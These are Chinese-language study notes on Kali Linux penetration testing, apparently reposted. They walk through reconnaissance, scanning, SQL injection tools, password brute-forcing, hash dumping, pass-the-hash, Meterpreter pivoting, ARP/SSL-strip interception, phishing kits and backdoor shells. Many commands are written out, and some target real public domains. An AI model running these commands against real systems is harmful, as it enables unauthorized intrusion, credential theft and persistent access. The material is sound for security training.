Kali Linux 學習


一.kali 安全滲透的一般測試 流程

1.信息收集

目標在線主機,域名信息,郵箱地址,常用密碼,同網段信息,子域名信息,指紋信息,端口信息

2.漏洞分析

cisco工具集(cisoco工具)

fuzzing工具集

openvas

開源評估軟件

掃描工具集

數據庫評估軟件

3.漏洞利用

4.權限維持(創建一個后門)

5.文檔編輯

二.谷歌黑客(goole hacker)

1.通過互聯網

searchdns.netcraft.com DNS查詢

shodaning.com大數據

http://www.exploit-db.com/google-dorks/

1 theHarverster信息搜集工具

theharvester -d microsoft.com -l 500 -b google

            theharvester -d microsoft.com -b pgp

            theharvester -d microsoft -l 200 -b linkedin

theharvester -d microsoft.com -l 500 -b all

2 metagoolefil


Usage: metagoofil options


         -d: domain to search

         -t: filetype to download (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)

         -l: limit of results to search (default 200)

         -h: work with documents in directory (use "yes" for local analysis)

         -n: limit of files to download

         -o: working directory (location to save downloaded files)

         -f: output file


 Examples:

  metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html

  metagoofil.py -h yes -o applefiles -f results.html (local dir analysis)

三 信息搜集之目標獲取

域名系統是因特網的一項服務,它作為域名和IP地址相互映射的一個分布式的數據庫

    從給定一個主域名到一個子域名的信息收集,是對目標的獲取與整理。dnsmap,dnsenum,fierce,dnsdict6

DNS區域傳送指得是一台備用服務器使用來自主服務器的數據刷新自己的域數據庫。這為運行中的dns服務提供了一定的冗余度,其目的是為了防止主的域名服務器因意外故障變得不可用是影響到整個域名的解析。

一般來說,DNS區域傳送操作只在網絡里真的有備用域名DNS服務器時,才有必要用到,但許多DNS服務器卻別錯誤地配置成只要有client發出請求,就會向對方提供一個zone數據庫的詳細信息。

     由此暴露出威脅:一旦黑客列出某個特定的zone的所有主機,收集域信息,即可選擇性的攻擊目標,找出未公開使用的IP地址,繞過基於網絡的訪問控制。

  比如訪問163,可以把所有的IP地址全部列出來,公開的和不公開的,攻擊者就可以選擇一些弱的IP來進行攻擊。

   使用dig進行域名解析(windows nklookup)

   使用dig進行域傳送漏洞

   子域名枚舉工具的介紹與使用

dig NS www.secsino.com

secsino.com.        5    IN    NS    ns3.cdncenter.com.

secsino.com.        5    IN    NS    ns6.cdncenter.com.

secsino.com.        5    IN    NS    ns4.cdncenter.com.

secsino.com.        5    IN    NS    ns5.cdncenter.com.

secsino.com.        5    IN    NS    ns2.cdncenter.com.

secsino.com.        5    IN    NS    ns1.cdncenter.com.

一個6個

來測試是否有域傳送漏洞信息

dig axfr @ns1.cndcenter.com secsino.com


DNS分析工具

fierce

fierce -dns www.secsino.com

進行查詢域傳送漏洞,如果沒有進行枚舉和破解



dnsmap secsino.com


dnsdict6 -4 secsino.com


三.信息收集和主機探測

netenum 192.168.1.1/24 >test

是通過ping來查看主機是否在線,不是特別靠譜,如果對方有防火牆就不可以了。可以生成一個列表。

fping -g ip

可以查看那些主機是存活的。

nbtscan -r 172.17.135.0/24


nbtscan -r 172.17.135.0/24

Doing NBT name scan for addresses from 172.17.135.0/24


IP address       NetBIOS Name     Server    User             MAC address      

------------------------------------------------------------------------------

172.17.135.1     PC-20141108YKCA  <server>  <unknown>        24:b6:fd:1a:87:dd

172.17.135.2     REDBULL          <server>  <unknown>        00:0c:29:09:bb:e8

172.17.135.3     TXD-1419165F468  <server>  <unknown>        00:0c:29:d2:45:88

172.17.135.131   BOBO             <server>  <unknown>        8c:89:a5:27:b5:b6

172.17.135.140   DYJ              <server>  <unknown>        08:10:76:df:4d:83


arping 172.17.135.4

可以查看到mac地址的

嗅探內網包(借助於一些ARP協議包的掃描)

netdiscover -h


 Currently scanning: 192.168.224.0/16   |   Screen View: Unique Hosts          

                                                                               

 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300               

 _____________________________________________________________________________

   IP            At MAC Address      Count  Len   MAC Vendor                   

 -----------------------------------------------------------------------------

 192.168.149.2   00:50:56:ef:8b:c6    03    180   VMWare, Inc.                 

 192.168.149.1   00:50:56:c0:00:08    01    060   VMWare, Inc.                 

 192.168.149.254 00:50:56:fa:94:bd    01    060   VMWare, Inc.


dmitry cidp.edu.cn

可以看到一些注冊人,和子域名的信息


wafw00f http://www.cidp.edu.cn

看是否有waf有保護,先用一個黑名單進行發送,然后看看發送回來有沒有。

Checking http://www.cidp.edu.cn

Generic Detection results:

No WAF detected by the generic detection

Number of requests: 13


對目標是否存在負載均衡檢測器工具

可以檢測多個IP地址映射到單個域名

lbd www.cidp.edu.cn


四。信息搜集之主機掃描

(課程目的,課程介紹)

1主機探測 版本探測 系統探測 支持探測腳本的編寫

https 443 weblogic701 oracle 1521

nmap的使用

nmap -iL target.txt 保存到一個列表

zenmap


五 信息搜集之指紋識別

1.banner抓取最簡單最基礎,不需要專門的工具就可以做。banner抓取是應用程序的指紋識別而不是操作系統的識別。

curl -I www.cidp.edu.cn


curl -I www.cidp.edu.cn

HTTP/1.1 200 OK

Date: Mon, 01 Dec 2014 11:24:42 GMT

Server: Apache/2.0.59 (Unix)

Last-Modified: Mon, 01 Dec 2014 07:12:49 GMT

ETag: "ee8001-6939-568a5e40"

Accept-Ranges: bytes

Content-Length: 26937

Content-Type: text/html

有時候Telnet也可以進行探測,nc有時候也可以。

nmap -sV -Pn -sT www.cidp.edu.cn -p80


xprobe2 目標地址 對於老系統比較好


被動指紋識別工具

p0f    進行被動抓取數據包


web指紋識別

whatweb www.cidp.edu.cn


http://www.cidp.edu.cn [200] ActiveX[Flash-ActiveX][d27cdb6e-ae6d-11cf-96b8-444553540000], Adobe-Flash, Apache[2.0.59], Country[CHINA][CN], Frame, HTTPServer[Unix][Apache/2.0.59 (Unix)], IP[211.71.233.21], JQuery, Meta-Author[%E5%A4%A7%E6%B1%89%E7%BD%91%E7%BB%9C], Object["http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0]["clsid:d27cdb6e-ae6d-11cf-96b8-444553540000], Script[javascript,text/javascript], Title[%E9%98%B2%E7%81%BE%E7%A7%91%E6%8A%80%E5%AD%A6%E9%99%A2]


探取cms識別工具

wpscan -u www.91ri.org


六 信息搜集 協議分析

針對smb利用工具

acccheck  主要檢查共享連接 ipc$ admin$,利用用戶名和密碼來進行攻擊。

amples

Attempt the 'Administrator' account with a [BLANK] password.

    acccheck -t 10.10.10.1

Attempt all passwords in 'password.txt' against the 'Administrator' account.

    acccheck -t 10.10.10.1 -P password.txt

Attempt all password in 'password.txt' against all users in 'users.txt'.

    acccehck -t 10.10.10.1 -U users.txt -P password.txt

Attempt a single password against a single user.

    acccheck -t 10.10.10.1 -u administrator -p password


smtp-user-enum 來查看有哪些郵箱等等


$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1

$ smtp-user-enum.pl -M EXPN -u admin1 -t 10.0.0.1

$ smtp-user-enum.pl -M RCPT -U users.txt -T mail-server-ips.txt

$ smtp-user-enum.pl -M EXPN -D example.com -U users.txt -t 10.0.0.1


sslscan ip  查看證書,查看是那種加密方式,最后可以得到一些公鑰信息

數據包分析工具 wireshark


七 openvas安裝與使用

做出作為一個nessus的子工具,也是一個綜合掃描的子工具。

先進行安裝

openvas-check-setup 檢查更新

openvas-mkcert 安裝證書(后面全部選擇默認)

openvas-nvt-sync 更新一些包

openvas-mkcert-client -n om -i 為客戶端創建證書

證書創建成功后,必須創建一個用戶進行登錄

openvasad -c add_user -n root -r Admin

openvassd 必須加載一個插件的加載

openvasmd --rebuild

更新漏洞庫內容

openvas-scapdata-sync 更新一些漏洞信息

openvas-certdata-sync

更新完以后可以運行 openvasmd --rebuild

更新完以后,需要結束openvassd進程,重新啟動服務,使用openvas-check-setup檢查無誤。

openvas-start

openvasmd  管理那個模塊沒有開啟,手動開啟

gsad --listen=0.0.0.0 --port=9392 --alisten=127.0.0.1 --aport=9390 --http-only

默認端口是9392端口打開的

https://localhost:9392/就可以進行登錄



八 web掃描工具的應用

1 golismero scan http://secsino.com

2 nikto -h www.secsino.com

   nikto -h www.secsino.com -p 80,445,21 對指定端口進行掃描


lynis 系統信息收集工具

 lynis --cheak--all

默認為當前的操作系統


unix-privesc-check standard


九 漏洞分析之web爬行

內部字典存放的位置

/usr/shell/wordlists  

1.apche-users -h 172.17.135.4  -l /usr/share/wordlists/apache-user2.0.txt -p 80 -s 0 -e 403 -t 10

這個就是枚舉的過程,判斷目錄是否存在。

2.cutycap --url=http://www.baidu.com --out=baidu.png

相當於對百度網站直接做了一個截圖(快照)

3.強大的目錄掃描工具

dirb http://172.17.135.3

4.dirbuster 圖形化的界面工具

5.vega 相當於awvs ,但是不是商業化軟件

6.webslayer

web測試,暴力攻擊

十 漏洞掃描工具

cadaver

root@kaifeng:~# cadaver --help

Usage: cadaver [OPTIONS] http://hostname[:port]/path

  Port defaults to 80, path defaults to '/'

Options:

  -t, --tolerant            Allow cd/open into non-WebDAV enabled collection.

  -r, --rcfile=FILE         Read script from FILE instead of ~/.cadaverrc.

  -p, --proxy=PROXY[:PORT]  Use proxy host PROXY and optional proxy port PORT.

  -V, --version             Display version information.

  -h, --help                Display this help message.

Please send bug reports and feature requests to <cadaver@webdav.org>

cadaver是一個用來瀏覽和修改webdav共享的Unix命令行程序,就像subversion客戶端,它使用了neon的http庫,不需要驚訝,neon和cadaver人作者是同一個人。cadaver是自由軟件。使用cadaver就像使用命令行的FTP程序,因此他很適合基本的webdav調試。它可以以壓縮的方式上傳和下載文件,也會檢驗屬性,拷貝,移動和鎖定和檢索文件。

1.cadaver http://172.17.135.22/dav/

可以put get 等等一系列操作和iisput差不多

davtest可以自動上傳一個漏洞文件,一些木馬文件

2.deblaze  xss或者web會用到

3.fimap 遠程文件和本地的漏洞掃描文件,會檢測一些遠程和本地包含漏洞測試。

fimap -u "路徑" --force-run

就可以檢測到可以讀取那些內容

如果get一個webshell

fimap -x --force-run 根據提示來進行操作,上傳一個shell,然后在進行提權。

4.Grabber web漏洞掃描器

root@kaifeng:~# grabber -h

Usage: grabber.py [options]


Options:

  -h, --help            show this help message and exit

  -u ARCHIVES_URL, --url=ARCHIVES_URL

                        Adress to investigate

  -s, --sql             Look for the SQL Injection

  -x, --xss             Perform XSS attacks

  -b, --bsql            Look for blind SQL Injection

  -z, --backup          Look for backup files

  -d SPIDER, --spider=SPIDER

                        Look for every files

  -i, --include         Perform File Insertion attacks

  -j, --javascript      Test the javascript code ?

  -c, --crystal         Simple crystal ball test.

  -e, --session         Session evaluations


eg:grabber --spider 1 --sql --xss --url http://172.17.135.22/

5. joomscan 針對joomlacms來進行測試

6. skipfish 是Google出品的一款自動化網絡安全掃描工具

skipfish -o ~/home/kaifeng(自己創建的目錄) 很好工具http://www.cidp.edu.cn


7.uniscan-gui 一款圖形化界面

8.W3af 是一個應用程序攻擊檢查文件,支持許多插件

9.wapiti 的工作方式和nikto差不多

python wapiti.py http://172.17.135.22 -v 2

可以檢測文件處理錯誤(本地和遠程)數據庫注入

xss注入 xss注入 ldap注入 命令執行檢測(eval(),system(),passtru()。。)crlf注射入(http響應,session固定等等)

root@kaifeng:~# wapiti http://www.cidp.edu.cn

Wapiti-2.2.1 (wapiti.sourceforge.net)

Traceback (most recent call last):

  File "/usr/bin/wapiti", line 444, in <module>

    wap.browse(crawlerFile)

  File "/usr/bin/wapiti", line 238, in browse

    self.urls, self.forms = self.HTTP.browse(crawlerFile)

可以爬取一些信息

10.webshag-gui 綜合的條用一些插件

11.websploit 掃描遠程和分析系統漏洞。可以快速的掃描

wsf > show modules


Web Modules            Description

-------------------        ---------------------

web/apache_users        Scan Directory Of Apache Users

web/dir_scanner            Directory Scanner

web/wmap            Information Gathering From Victim Web Using (Metasploit Wmap)

web/pma                PHPMyAdmin Login Page Scanner

web/cloudflare_resolver        CloudFlare Resolver



Network Modules            Description

-------------------        ---------------------

network/arp_dos            ARP Cache Denial Of Service Attack

network/mfod            Middle Finger Of Doom Attack

network/mitm            Man In The Middle Attack

network/mlitm            Man Left In The Middle Attack

network/webkiller        TCP Kill Attack

network/fakeupdate        Fake Update Attack Using DNS Spoof

network/arp_poisoner        Arp Poisoner



Exploit Modules            Description

-------------------        ---------------------

exploit/autopwn            Metasploit Autopwn Service

exploit/browser_autopwn        Metasploit Browser Autopwn Service

exploit/java_applet        Java Applet Attack (Using HTML)



Wireless / Bluetooth Modules        Description

-------------------        ---------------------

wifi/wifi_jammer        Wifi Jammer

wifi/wifi_dos            Wifi Dos Attack

wifi/wifi_honeypot        Wireless Honeypot(Fake AP)

bluetooth/bluetooth_pod        Bluetooth Ping Of Death Attack


十一 數據庫漏洞工具

1.tnscmd10g 不經常用

2.sqlsus 開放源代碼MySQL注入和接管工具

root@kaifeng:~# sqlsus


              sqlsus version 0.7.2


  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)


Usage:

    sqlsus [options] [config file]


     Options:

         -h, --help                    brief help message

         -v, --version                 version information

         -e, --execute <commands>      execute commands and exit

         -g, --genconf <filename>      generate configuration file


sqlsus -g test.comf 生成一個配置文件,然后進行編輯

修改 our $url_start="";寫入地址

啟動並且調試

sqlsus test.conf 獲取數據庫數據

查看全部數據庫名字

sqlsus>get database

sqlsus>set database 設定數據庫

sqlsus>set database mysql 選定為MySQL數據庫

sqlsus>get tables 獲取為MySQL的數據庫表

3.sqlninja 主要針對sqlserver數據庫,來返回一個xp_cmdshell,對sa口令的強力攻擊

root@kaifeng:~# sqlninja

Sqlninja rel. 0.2.6-r1

Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>

Usage: /usr/bin/sqlninja

    -m <mode> : Required. Available modes are:  //指定攻擊模塊,有以下幾個

       t/test - test whether the injection is working  #測試連接是否是注入點

       f/fingerprint - fingerprint user, xp_cmdshell and more  #指紋識別,判斷用戶,數據庫,xp_cmdshell是否能用等等

       b/bruteforce - bruteforce sa account  #暴力破解sa密碼,可以使用-w指定字典,也可以不使用字典,這樣sqlninja就會自己窮舉

       e/escalation - add user to sysadmin server role  #提權用,必須用-p指定sa的password,成功就會把當前數據庫加入到sa組里面

       x/resurrectxp - try to recreate xp_cmdshell  #嘗試恢復xp_cmdshell

       u/upload - upload a .scr file   #使用get和post上傳二進制文件,-p可以指定sa的password,-g表示只生成上傳文件,但並不上傳

       s/dirshell - start a direct shell  # 獲得目標主機的shell

       k/backscan - look for an open outbound port  #查看開放的端口

       r/revshell - start a reverse shell   #反彈會一個shell,和dirshell相反

       d/dnstunnel - attempt a dns tunneled shell  #指定使用DNS作為傳輸通道,可用-p指定sa的password,為什么有這個模式。因為可能服務器連icmp都禁止。同樣想要使用這個模式得先用upload模式上傳dnstun.exe

       i/icmpshell - start a reverse ICMP shell  #檔dirshell和revshell都失敗的情況下,可以用這個模式把shell藏在icmp里,但是先要上傳imcpsh.exe(在upload模式里)

       c/sqlcmd - issue a 'blind' OS command   #以上方法都失敗之后,可以用它執行簡單的cmd命令,可惜的是沒回回顯

       m/metasploit - wrapper to Metasploit stagers  #使用metasploit作為shell

    -f <file> : configuration file (default: sqlninja.conf)  #指定配置文件,sqlninja沒有類似sqlmap的“-u”參數,注入網址是寫在配置文件里的,默認是sqlninja.conf。 用數字(0,1,2,3,4)來指定數據庫。

    -p <password> : sa password

    -w <wordlist> : wordlist to use in bruteforce mode (dictionary method

                   only)

    -g : generate debug script and exit (only valid in upload mode)

    -v : verbose output

    -d <mode> : activate debug

       1 - print each injected command

       2 - print each raw HTTP request

       3 - print each raw HTTP response

       all - all of the above

    ...see sqlninja-howto.html for details

 默認參數也要寫到配置文件里面,默認為sqlninja.conf

sqlmap

sqlmap -u "" --cookie='PHPSESSID=;secsicuty=low'


十二 web代理

代理工具數據,進行抓包改包,暴力攻擊等等一些操作

1.burp suite 代理代表的一些工具

2.owasp-zap

3.vega 有一個代理

4.webscarab  

webscarab一款代理軟件,包括http代理,網絡爬行、網絡蜘蛛,回話ID分析,自動腳本接口,模糊測試工具,web格式的編碼/解碼,web服務描述語言和soap解析器等功能模塊。webscarab基於gun協議,使用Java編寫,是webgoat中所使用的工具之一。

十二 漏洞分析工具fuzz

1.bed 能夠檢查緩存區溢出,格式串漏洞,整數溢出

bed -s FTP -t 172.17.132.2 -p 21 -o 5

2.ohrwurm 主要是rtp

3.wfuzz web應用的模糊測試工具,可以進行web應用暴力拆解,也支持對網站目錄,登錄信息,應用資源文件等的暴力猜解,還可以進行get及post參數的猜解,sql注入,xss漏洞的測試。改工具所有功能都依賴於字典。

wfuzz -c -z file,common.txt --hc 404 -o html http://www.baidu.com/FUZZ 2>tes.html

wfuzz -c -z file,users.txt -z file,pass.txt --hc 404 http://www.site.com/log.asp?user=FUZZ&pass=FUZZ

登錄頁面口令猜解,忽略404頁面

wfuzz -c -z range,1-10 --hc=BBB http://www.site.com/FUZZ{something}

頁面數目猜解,與burp不同的是,它更輕量級。

4.xsser 命令行版本和界面版本

xsser -u "http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=" --cookie="PHPSESSID=3f0cbd75725ed1a9b5d47396c4aeb2a7;security=low" -v


[*] List of possible XSS injections:

===========================================================================


[I] Target: http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=

[+] Injection: http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=/">a01a46f10d098c521b4eb470e82ea23f

[-] Method: xss

[-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


十三 在線密碼攻擊

1.cewl 是一個很酷的工具,通過爬行網站獲取關鍵信息創建一個密碼字典。

官網:http://digi.ninja/projects/cewl.php

2.cat 思科審計工具,掃描思科路由器的一般性漏洞:默認密碼snmpcommunity字符

3.findmyhash

findmyhash MD5 -h hash值 去找所有的網站的接口去破解

4.hydra

FTP

hydra -L user.txt -P pass.txt -F ftp://172.17.135.2

SSH

hydra -L user.txt -P pass.txt -F ssh://172.17.135.2:22

SMB

hydra -L user.txt -P pass.txt -F smb://172.17.135.2

MSSQL

hydra -L user.txt -P pass.txt -F mssql://172.17.135.2:1433

5.medusa

medusa -h 172.17.135.2 -u root  -P //wordlist/rockyou.txt -M ssh

6.NCrack  基本功能相似,突出是3389爆破的功能

ncrack -vv -U windows.user -P windows.pwd 172.17.135.2:3389,CL=1 -f

7.onesixtyone 是一個snmp掃描工具,用於找出設備上的snmp community字符,掃描速度非常快。

8.patator  Python編寫,如枚舉一個服務用戶名和密碼

patator ssh_login host=172.17.135.2 user=root passowrd=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'

9.phrasendrescher

10.thc-pptp-bruter 主要針對pptp VPN端點(tcp端口1723)的暴力破解程序。

十四 密碼離線攻擊

1.ophcrack 彩虹表

2.pyrit  密碼無線攻擊

pyrit -r xxx.cap analyze

開始跑包(單純字典)

pyrit -r xxx.cap -i yyy.dic -b ssid attack_passthrough

也可以將pyrit與crunch結合使用

crunch 8 8 1234567890 | pyrit -i - -r /file/hack01-cap -b bssid attach_passthrough

3.rcrack 彩虹表密碼哈希工具

4.rsmangler

rsmangler -f /test  字典生成工具

5.bkhive Linux下破解window下哈希的工具

首先獲取win下的文件

Sam文件: c:\windows\system32\config\sam

system文件: c:\windows\system32\config\system

先用bkhive從system文件生成一個bootkey文件

bkhive  system bootkey

再用bootkey和sam文件通過samdump2生成一個密碼hash文件

samdump2 sam bootkey >hashes

接着只用John破解John hashes即可。

6.sucrack  借助su命令進行本地root賬戶的密碼破解

7.truecrack

十四 密碼攻擊之哈希傳遞

個人感覺主要利用msf(psexec)這個掃描模塊來進行傳遞hash,可以返回來一個payload。

通過Windows pwdump7.exe 來進行抓取hash

1.pth-winexe

pth-winexe -U Administrator和hash //172.17.135.2 cmd

這樣就可以返回一個本地的shell

2.keimpx

keimpx -t 172.17.135.2 -c /root/pass.txt -v 2 看pass.txt里面保存的hash來進行一一嘗試,是否可以進行連接

3.metaspoloit

exploit/windows/smb/psexse

十五 密碼無線的破解


十六 metasploit

在跳板機子獲取一定權限后,需要積極的向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,借助msf已經得到的meterpreter后門,可以使系列的操作更容易。

1.首先我們先看主機網卡信息,看有多少主機

2.如果我們拿到shell ip地址是 172.17.135.2,內網主機為10.0.0.1,因為內網ip我們是無妨訪問的。

3.首先我們先meterpreter里面增加一條路由

run autoroute -s 10.0.0.1 就把我們172段地址加入里面了

4.為了訪問,我們開一個socks代理模塊

use auxiliary/server/socks

exploit

這個時候我們已經創建一個代理了,然后把kali瀏覽器的代理設置成127.0.0.1 端口設置成1080,然后在訪問10.0.0.2,就可以訪問了內網的計算機了。

run arp_scanner -h 經常查看內網主機

run arp_scanner -r 10.0.0.1/24


十七 kali漏洞利用工具beff

默認的IP http://127.0.0.1:3000/ui/authentication

beef-xss提供了一個測試頁面

http://127.0.0.1:3000/demos/basic.html

最重要的一項是把beef和metasploit聯合起來。下面是配置命令

cd /usr/share/beef-xss/

vim config.yaml //把metaspoloit那一項改成true

cd /extension/metasploit

nano config.yaml  //修改host和call_back都改成主機地址

然后打開msfconsole輸入以下命令

load msgrpc ServerHost=主機ip Pass=abc123

 cd /usr/share/beef-xss/

./beef -x 重新加載metasploit模塊

這時候重啟一下服務

service beef-xss restart


十八 kali漏洞利用set工具(社會工程會攻擊)

1 命令行輸入 setoolkit打開set套件

輸入1為社會工程會攻擊

1魚叉式攻擊 2 網站攻擊框架 3 介質感染攻擊 4 創建payload攻擊 5群發郵件攻擊 6基於arduino的攻擊 7短信欺騙攻擊 8無線接入點攻擊 9二維碼攻擊 10 powershell攻擊 11 第三方模塊

1.魚叉式攻擊主要目的發送存在惡意軟件的釣魚軟件,相應的payload模塊可以選擇。

2.開放一個webserver服務,如果對方訪問此頁面,若系統存在漏洞觸發條件,則會被植入后門。 如Java applet attack 方法就需要目標有Java運行環境。為了仿真,你可以選擇自建模板或克隆一個網站。(重點演示,可以結合毒化和抓包來進行欺騙內網機子和劫持)

3 介質感染攻擊

借助autorun.inf執行exploit得到一個返回的shell,也可以結合metasploit的后門

fasttrack也被整理到setoolkit里面。


十九 嗅探欺騙和中間人攻擊

linux下的中間人攻擊套路都是一樣的,這里介紹進行ARP欺騙,DNS欺騙和嗅探以及回話劫持(cookie)的方法。

1 為kali設置開啟端口轉發

echo 1 > /proc/sys/net/ipv4/ip_forward

2設置ssltrip

為了劫持ssl數據,需要使https數據變為https

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081

讓ssltrip在8081端口監聽

sslstrip -l 8081

我們使用的工具ettercap這個中間人攻擊工具,如果是第一次使用,需要設置配置

配置文件/etc/ettercap/etter.conf 首先要將ec_uid,ec_gid都變為0

在把配置文件里面,在linux下面,把下面兩行注釋警號全部去掉

第一步打開 ettercap -G 圖形化界面


第二十課  web后門

1.weevely 僅限php,相當於菜刀的一款工具

weevely generate test ~/1.php

連接:weevely http://172.17.135.3/1.php test(密碼)

2.webacoo

webacoo -t -u http://172.17.135.3/2.php

 系統后門 首先我們先提取進程 ps aux | grep ~/bin/bash"

 1.系統端:dbd -l -p 2333(bash進程號) -e /bin/bash -k password

    連接端:dbd 127.0.0.1 2333 -k password

連接以后,機子並沒有什么反應,但是直接執行命令就可以了。

2.intersect

 數字1 創建一個shell

然后依次為 bshell   creds  portscan  自由加了三個模塊。添加完以后就:create,然后輸入shell,還需要綁定端口 5555,遠程主機 172.17.135.3 遠程端口 23333 。這樣就設置完成了。完成以后,下面會給出保存的路徑。,默認為.py文件。

執行文件

./shell.py -b 綁定  那么這個時候就綁定這個端口了

我們在遠程用nc進行連接

nc -nvv 127.0.0.1 5555  這個時候就得到一個shell了。


第二十一課 權限維持之tunnel

1.cryptcat  使用方法與dbd 方法相似


第二十二課 壓力測試

所謂壓力測試,就是攻擊服務器所能承受的范圍,所謂的ddos攻擊。

主要是消耗某一種資源,來讓服務器不正常。


第二十三課 數字取證工具

1.peepdf是一個使用Python編寫的PDF文件分析工具,它可以檢測惡意的pdf文件。其設計目標是為安全研究人員提供的pdf分析中可能用到的所有組件,無需使用3或4種工具來完成同一件任務。

2.反數字取證 用來檢測 linux下面關鍵命令是否被注入了后門。

3.內從取證工具集

volatility是開源的window,linux等內從取證分析工具,有Python編寫成,命令行操作,支持各種操作。

http://www.freebuf.com/articles/system/26763.html

4 binwalk 來判斷是什么文件格式,原始文件是什么。

5 dff 是一個簡單但強大的數字取證工具輔助工具,它具有一個靈活的模塊系統。具有多種功能,包括:恢復錯誤或奔潰導致文件丟失,證據的研究和分析等。pdf提供了一個強大的體系結構和一些有用的模塊。

第二十三課 報告工具與系統服務

1.dradis 基於瀏覽器的在線筆記


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM